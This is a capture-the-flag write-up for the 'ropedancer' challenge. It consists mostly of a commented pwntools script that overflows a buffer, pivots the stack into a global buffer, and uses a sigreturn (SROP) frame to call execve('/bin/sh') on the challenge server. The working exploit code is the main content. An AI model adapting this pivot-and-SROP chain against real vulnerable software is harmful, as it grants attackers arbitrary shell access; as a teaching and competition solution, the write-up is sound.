Tags: stack_pivot srop
Rating:
Solution: Use a stack pivot to ROP from 'motivation_letter'. From there use SROP to set the registers and call execve("/bin/sh").
```
# Solve script for the 'ropedancer' challenge (tags: stack pivot + SROP).
# Flow: the first input overflows and pivots the stack into the
# `motivation_letter` buffer; the second input fills that buffer with
# "/bin/sh", a short chain that sets rax, and a sigreturn frame.
import pwn
import time      # NOTE(review): not used below
import warnings
import datetime  # NOTE(review): not used below
# sendlineafter() is called with str arguments; pwntools warns about that.
warnings.filterwarnings(action='ignore', category=BytesWarning)
elf = pwn.ELF("./ropedancer")
pwn.context.binary = elf
pwn.context.log_level = "DEBUG"  # full I/O trace; lower to "INFO" for a quieter run
pwn.context(terminal=['tmux', 'split-window', '-h'])
# Start
# p = elf.process()  # local run, kept for debugging
p = pwn.remote("static-03.heroctf.fr", "5002")
# pwn.gdb.attach(p, "b *0x401118")
p.sendlineafter("ROPedancer? ", "yes")
# Stage 2 is written into `motivation_letter`; the pivot moves rsp there.
stage2_addr = elf.symbols["motivation_letter"]
# Distance to the saved return address, found beforehand with a cyclic pattern.
offset = pwn.cyclic_find("gaaa")
# Stage 1: padding, then the saved rbp slot := stage2_addr, then the return
# address := a gadget that copies rbp into rsp (the pivot itself).
payload1 = b"A" * (offset - 8)
payload1 += pwn.p64(stage2_addr)
payload1 += pwn.p64(0x401114) # mov rsp, rbp; pop rbp; ret;
p.sendlineafter("contact you: ", payload1)
# payload2 begins with "/bin/sh\x00", so the path sits at the buffer's start.
bin_sh_addr = elf.symbols["motivation_letter"]
syscall_gadget = 0x401112
# Register state that rt_sigreturn restores: execve(bin_sh_addr, NULL, NULL)
# with rip back on the syscall gadget.
frame = pwn.SigreturnFrame()
frame.rax = 0x3B # syscall number for execve
frame.rdi = bin_sh_addr
frame.rsi = 0x0
frame.rdx = 0x0
frame.rip = syscall_gadget
# Stage 2 layout, as seen from the pivoted rsp:
#   "/bin/sh\x00"      - presumably eaten by the pivot gadget's `pop rbp`
#   xor eax,eax;inc al - rax = 1, then 14 more `inc al` -> rax = 0xF
#                        (rt_sigreturn on x86-64, hence the SROP tag)
#   syscall gadget     - kernel loads `frame` and returns into the syscall gadget
payload2 = b"/bin/sh\x00"
payload2 += pwn.p64(0x0000000000401011) # xor eax, eax; inc al; ret;
payload2 += pwn.p64(0x0000000000401013) * (0xF - 1) # inc al; ret
payload2 += pwn.p64(syscall_gadget)
payload2 += bytes(frame)
p.sendlineafter("hire you: ", payload2)
p.interactive()
```